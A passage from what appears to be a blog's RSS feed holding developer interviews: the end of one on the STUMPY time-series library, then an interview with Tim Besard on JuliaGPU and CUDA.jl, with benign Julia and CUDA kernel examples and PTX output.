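for x in [0.0, 1.0, 2.0, 9.0, 0.0, 1.0, 2.0]:
    sp.update(x)
# The last window [0, 1, 2] exactly repeats the first, so both windows
# end up with a nearest-neighbor distance of 0.0.
print(sp.profile)
```

The key point is that each new point costs work proportional to the data seen so far, rather than recomputing the whole profile from scratch, which is what makes on-the-fly analysis of a continuous stream tractable.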
&lt;h4 id=&quot;how-do-you-think-stumpy-will-evolve-do-you-have-in-mind-new-features-to-implement-in-the-near-future&quot;&gt;How do you think STUMPY will evolve? Do you have in mind new features to implement in the near future?&lt;&#x2F;h4&gt;
&lt;p&gt;One of the co-founders of Explosion, Ines Montani, gave a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;speakerdeck.com&#x2F;inesmontani&#x2F;let-them-write-code-keynote-pycon-india-2019&quot;&gt;wonderful talk at PyCon India 2019&lt;&#x2F;a&gt; titled “Let Them Write Code” where she identified that ‘Good tools help people do their work. You don’t have to do their work for them. Worst developer experiences: tools that want to be “fully integrated solution”’, which I think embodies our approach to developing STUMPY. We have purposely limited the scope of STUMPY and stayed laser-focused on making our code base rock solid, performant, well tested, and super user-friendly. While it may be tempting to over-simplify time series analysis and offer additional things like data cleaning or custom visualization tools all in one package, we want to enable all of our users to really think through their analysis approach rather than relying on a package to make assumptions about their data, which are more than likely to be wrong anyway. To that end, STUMPY has already achieved its goal of providing an efficient way for users to compute matrix profiles that scales across a wide variety of hardware. Additionally, there has been a lot of interest in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;stumpy.readthedocs.io&#x2F;en&#x2F;latest&#x2F;api.html&quot;&gt;computing matrix profiles with non-normalized Euclidean distances&lt;&#x2F;a&gt; (as opposed to z-normalized Euclidean distances) and so we’ve added a suite of new features that addresses these needs and you can check out our &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;TDAmeritrade&#x2F;stumpy&#x2F;issues&quot;&gt;current backlog of feature enhancements on our public Github page&lt;&#x2F;a&gt;. 
There is still a lot of work that needs to be done to socialize the matrix profile approach, to educate others through public talks and tutorials that use real-world examples, and to continue building and fostering a transparent and supportive community. Of course, this will take time and is easier said than done but we’re making progress everyday.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;are-there-any-books-you-recommend-reading-on-the-topic&quot;&gt;Are there any books you recommend reading on the topic?&lt;&#x2F;h4&gt;
&lt;p&gt;Unfortunately, there aren’t any books on the topic yet but, for starters, readers may be interested in exploring the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;stumpy.readthedocs.io&#x2F;en&#x2F;latest&#x2F;tutorials.html&quot;&gt;STUMPY tutorials&lt;&#x2F;a&gt; or watching this &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=xLbPP5xNIJs&quot;&gt;STUMPY video&lt;&#x2F;a&gt; (hosted by the Stitch Fix Algorithms team) as they provide a balanced mixture of background information, relevant context, and technical detail to help you develop the right intuition. Additionally, I strongly recommend skimming the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.cs.ucr.edu&#x2F;~eamonn&#x2F;MatrixProfile.html&quot;&gt;plethora of articles published by Eamonn Keogh’s group&lt;&#x2F;a&gt;. They’re actually a pleasure to read and I continually learn more each time I re-read these foundational papers.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;where-can-readers-find-you-and-where-can-they-learn-more-about-stumpy&quot;&gt;Where can readers find you and where can they learn more about STUMPY?&lt;&#x2F;h4&gt;
&lt;p&gt;I blog occasionally &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;seanlaw.github.io&#x2F;&quot;&gt;on my personal website&lt;&#x2F;a&gt; but you can follow me on Twitter @seanmylaw and you can stay up-to-date on the development of STUMPY @stumpy_dev. Additionally, please post all of your STUMPY questions to our &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;TDAmeritrade&#x2F;stumpy&#x2F;issues&quot;&gt;Github issues page&lt;&#x2F;a&gt; as this will help ensure that all user questions are recorded and searchable by others. Also, we’re always looking for new contributors and, especially if you are a tech minority, we’d love to work together with you. And don’t forget to &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;stumpy.readthedocs.io&#x2F;en&#x2F;latest&#x2F;&quot;&gt;share STUMPY&lt;&#x2F;a&gt; with all of your friends and colleagues and let us know how you are using STUMPY!&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Julia GPU</title>
          <pubDate>Tue, 20 Oct 2020 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/julia-gpu/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/julia-gpu/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/julia-gpu/">&lt;h3 id=&quot;how-the-julia-language-is-making-it-easy-for-programmers-to-use-gpu-capabilities-with-juliagpu&quot;&gt;How the Julia language is making it easy for programmers to use GPU capabilities with JuliaGPU&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-KJX3T1Y9T1Cj0aV3m-A22w.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;We are living in a time where more and more data is being created every day, along with new techniques and complex algorithms that try to extract the most out of it. As such, CPU capabilities are approaching a bottleneck in their computing power. GPU computing opened the way to a new paradigm for high-performance parallel computation a long time ago, but it was not until recently that it became widely used for data science.&lt;br &#x2F;&gt;
In this interview, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;maleadt&quot;&gt;Tim Besard&lt;&#x2F;a&gt;, one of the main contributors to the JuliaGPU project, digs into some of the details about GPU computing and the features that make Julia a language suited for such tasks, not only from a performance perspective but also from a user one.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;h4 id=&quot;please-tell-us-a-bit-about-yourself-what-is-your-background-what-is-your-current-position&quot;&gt;Please tell us a bit about yourself. What is your background? What is your current position?&lt;&#x2F;h4&gt;
&lt;p&gt;I’ve always been interested in systems programming, and after obtaining my CS degree I got the opportunity to start a PhD at Ghent University, Belgium, right when Julia was first released around 2012. The language seemed intriguing, and since I wanted to gain some experience with LLVM, I decided to port some image processing research code from MATLAB and C++ to Julia. The goal was to match performance of the C++ version, but some of its kernels were implemented in CUDA C… So obviously Julia needed a GPU back-end!&lt;&#x2F;p&gt;
&lt;p&gt;That was easier said than done, of course, and much of my PhD was about implementing that back-end and (re)structuring the existing Julia compiler to facilitate these additional back-ends. Nowadays I’m at Julia Computing, where I still work on everything GPU-related.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-is-juliagpu-what-is-the-goal-of-the-project&quot;&gt;What is JuliaGPU? What is the goal of the project?&lt;&#x2F;h4&gt;
&lt;p&gt;JuliaGPU is the name we use to group GPU-related resources in Julia: There’s a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;JuliaGPU&quot;&gt;GitHub organization&lt;&#x2F;a&gt; where most packages are hosted, a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;juliagpu.org&#x2F;&quot;&gt;website&lt;&#x2F;a&gt; to point the way for new users, we have &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;JuliaGPU&#x2F;gitlab-ci&quot;&gt;CI infrastructure&lt;&#x2F;a&gt; for JuliaGPU projects, there’s a Slack channel and Discourse category, etc.&lt;&#x2F;p&gt;
&lt;p&gt;The goal of all this is to make it easier to use GPUs for all kinds of users. Current technologies often impose significant barriers to entry: CUDA is fairly tricky to install, C and C++ are not familiar to many users, etc. With the software we develop as part of the JuliaGPU organization, we aim to make it easy to use GPUs, without hindering the ability to optimize or use low-level features that the hardware has to offer.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-is-gpu-computing-how-important-is-it-nowadays&quot;&gt;What is GPU computing? How important is it nowadays?&lt;&#x2F;h4&gt;
&lt;p&gt;GPU computing means using the GPU, a device originally designed for graphics processing, to perform general-purpose computations. It has grown more important now that CPU performance is not improving as steadily as it used to. Instead, specialized devices like GPUs or FPGAs are increasingly used to improve the performance of certain computations. In the case of GPUs, the architecture is a great fit for highly-parallel applications. Machine learning networks are a good example of such parallel applications, and their popularity is one of the reasons GPUs have become so important.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;do-you-think-julia-is-an-appropriate-language-to-efficiently-use-gpu-capabilities-why&quot;&gt;Do you think Julia is an appropriate language to efficiently use GPU capabilities? Why?&lt;&#x2F;h4&gt;
&lt;p&gt;Julia’s main advantage is that the language was designed to be compiled. Even though the syntax is high-level, the generated machine code is&lt;br &#x2F;&gt;
compact and has great performance characteristics (for more details, see &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;janvitek.org&#x2F;pubs&#x2F;oopsla18b.pdf&quot;&gt;this paper&lt;&#x2F;a&gt;). This is crucial for GPU execution, where we are required to run native binaries and cannot easily (or efficiently) interpret code as is often required by other language’s semantics.&lt;&#x2F;p&gt;
&lt;p&gt;Because we’re able to directly compile Julia for GPUs, we can use almost all of the language’s features to build powerful abstractions. For example, you can define your own types, use those in GPU arrays, compose that with existing abstractions like lazy “Transpose” wrappers, access those on the GPU while benefiting from automatic bounds-checking (if needed), etc.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;from-a-python-programmer-perspective-how-does-cuda-jl-compare-to-pycuda-are-their-functionalities-equivalent&quot;&gt;From a Python programmer perspective, how does CUDA.jl compare to PyCUDA? Are their functionalities equivalent?&lt;&#x2F;h4&gt;
&lt;p&gt;PyCUDA gives the programmer access to the CUDA APIs, with high-level Python functions that are much easier to use. CUDA.jl provides the same, but in Julia. The &lt;code&gt;hello world&lt;&#x2F;code&gt; from PyCUDA’s home page looks almost identical in Julia:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;using CUDA&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;function multiply_them(dest, a, b)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; i = threadIdx().x&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; dest[i] = a[i] * b[i]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; return&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;end&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;a = CuArray(randn(Float32, 400))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;b = CuArray(randn(Float32, 400))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;dest = similar(a)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;@cuda threads=400 multiply_them(dest, a, b)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;println(dest-a.*b)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;There’s one very big difference: “multiply_them” here is a function written in Julia, whereas PyCUDA uses a kernel written in CUDA C. The reason is straightforward: Python is not simple to compile. Of course, projects like Numba prove that it is very much possible to do so, but in the end those are separate compilers that try to match the reference Python implementation as closely as possible. With CUDA.jl, we integrate with the reference Julia compiler, so it’s much easier to guarantee consistent semantics and follow suit when the language changes (for more details,&lt;br &#x2F;&gt;
refer to &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;arxiv.org&#x2F;abs&#x2F;1712.03112&quot;&gt;this paper&lt;&#x2F;a&gt;).&lt;&#x2F;p&gt;
&lt;h4 id=&quot;are-the-packages-in-the-juliagpu-organization-targeted-to-experienced-programmers-only&quot;&gt;Are the packages in the JuliaGPU organization targeted to experienced programmers only?&lt;&#x2F;h4&gt;
&lt;p&gt;Not at all. CUDA.jl targets different kinds of (GPU) programmers. If you are confident writing your own kernels, you can do so, while using all of the low-level features CUDA GPUs have to offer. But if you are new to the world of GPU programming, you can use high-level array operations that use existing kernels in CUDA.jl. For example, the above element-wise multiplication could just as well be written as:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;using CUDA&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;a = CuArray(randn(Float32, 400))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;b = CuArray(randn(Float32, 400))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;dest = a .* b&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h4 id=&quot;is-it-necessary-to-know-how-to-code-in-cuda-jl-to-take-full-advantage-of-gpu-computing-in-julia&quot;&gt;Is it necessary to know how to code in CUDA.jl to take full advantage of GPU computing in Julia?&lt;&#x2F;h4&gt;
&lt;p&gt;Not for most users. Julia has a powerful language of generic array operations (“map”, “reduce”, “broadcast”, “accumulate”, etc) which can be applied to all kinds of arrays, including GPU arrays. That means you can often re-use your codebase developed for the CPU with CUDA.jl (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.sciencedirect.com&#x2F;science&#x2F;article&#x2F;abs&#x2F;pii&#x2F;S0965997818310123&quot;&gt;this paper&lt;&#x2F;a&gt; shows some powerful examples). Doing so often requires minimal changes: changing the array type, making sure you use array operations instead of for loops, etc.&lt;&#x2F;p&gt;
&lt;p&gt;It’s possible you need to go beyond this style of programming, e.g., because your application doesn’t map cleanly onto array operations or because you want to use specific GPU features. In that case, some basic knowledge about CUDA and the GPU programming model is sufficient to write kernels in CUDA.jl.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;how-is-the-experience-of-coding-a-kernel-in-cuda-jl-in-comparison-to-cuda-c-and-how-transferable-is-the-knowledge-to-one-another&quot;&gt;How is the experience of coding a kernel in CUDA.jl in comparison to CUDA C and how transferable is the knowledge to one another?&lt;&#x2F;h4&gt;
&lt;p&gt;It’s very similar, and that’s by design: We try to keep the kernel abstractions in CUDA.jl close to their CUDA C counterparts such that the programming environment is familiar to existing GPU programmers. Of course, by using a high-level source language there are many quality-of-life improvements. You can allocate shared memory, for example, statically and dynamically as in CUDA C, but instead of a raw pointer we use an N-dimensional array object that you can easily index. An example from the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;developer.nvidia.com&#x2F;blog&#x2F;using-shared-memory-cuda-cc&#x2F;&quot;&gt;NVIDIA developer blog&lt;&#x2F;a&gt;:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;__global__ void staticReverse(int *d, int n)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; __shared__ int s[64];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; int t = threadIdx.x;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; int tr = n-t-1;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; s[t] = d[t];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; __syncthreads();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; d[t] = s[tr];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The CUDA.jl equivalent of this kernel looks very familiar, but uses array objects instead of raw pointers:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;function staticReverse(d)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; s = @cuStaticSharedMem(Int, 64)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; t = threadIdx().x&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; tr = length(d)-t+1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; s[t] = d[t]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; sync_threads()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; d[t] = s[tr]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; return&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;end&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Using array objects has many advantages, e.g., multi-dimensional indexing is greatly simplified and we can just write “d[i,j]”. But it’s also safer, because these accesses are bounds checked:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;julia&amp;gt; a = CuArray(1:64)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;64-element CuArray{Int64,1}:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; 1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; 2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; 3&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; ⋮&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; 62&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; 63&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; 64&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;julia&amp;gt; @cuda threads=65 staticReverse(a)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;ERROR: a exception was thrown during kernel execution.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Stacktrace:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; [1] throw_boundserror at abstractarray.jl:541&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Bounds checking isn’t free, of course, and once we’re certain our code is correct we can add an “@inbounds” annotation to our kernel and get the high-performance code we expect:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;julia&amp;gt; @device_code_ptx @cuda threads=64 staticReverse(a)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;.visible .entry staticReverse(.param .align 8 .b8 d[16]) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; .reg .b32 %r&amp;lt;2&amp;gt;;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; .reg .b64 %rd&amp;lt;15&amp;gt;;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; .shared .align 32 .b8 s[512];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;mov.b64 %rd1, d;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; ld.param.u64 %rd2, [%rd1];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; ld.param.u64 %rd3, [%rd1+8];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; mov.u32 %r1, %tid.x;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; cvt.u64.u32 %rd4, %r1;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; mul.wide.u32 %rd5, %r1, 8;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; add.s64 %rd6, %rd5, -8;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; add.s64 %rd7, %rd3, %rd6;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; ld.global.u64 %rd8, [%rd7+8];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; mov.u64 %rd9, s;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; add.s64 %rd10, %rd9, %rd6;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; st.shared.u64 [%rd10+8], %rd8;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; bar.sync 0;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; sub.s64 %rd11, %rd2, %rd4;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; shl.b64 %rd12, %rd11, 3;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; add.s64 %rd13, %rd9, %rd12;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; ld.shared.u64 %rd14, [%rd13+-8];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; st.global.u64 [%rd7+8], %rd14;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; ret;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;julia&amp;gt; a&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;64-element CuArray{Int64,1}:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; 64&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; 63&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; 62&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; ⋮&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; 3&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; 2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; 1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Tools like “@device_code_ptx” make it easy for an experienced developer to inspect the generated code and ensure the compiler does what they want.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;why-does-having-a-compiler-have-such-an-impact-in-libraries-like-cuda-jl-how-was-the-process-of-integrating-it-to-the-julia-compiler&quot;&gt;Why does having a compiler have such an impact in libraries like CUDA.jl? (How was the process of integrating it to the Julia compiler?)&lt;&#x2F;h4&gt;
&lt;p&gt;Because we have a compiler at our disposal, we can rely on higher-order functions and other generic abstractions that specialize based on the arguments that users provide. That greatly simplifies our library, but also gives the user very powerful tools. As an example, we have carefully implemented a &lt;code&gt;mapreduce&lt;&#x2F;code&gt; function that uses shared memory, warp intrinsics, etc. to perform a high-performance reduction. The implementation is generic though, and will automatically re-specialize (even at run time) based on the arguments to the function:&lt;&#x2F;p&gt;
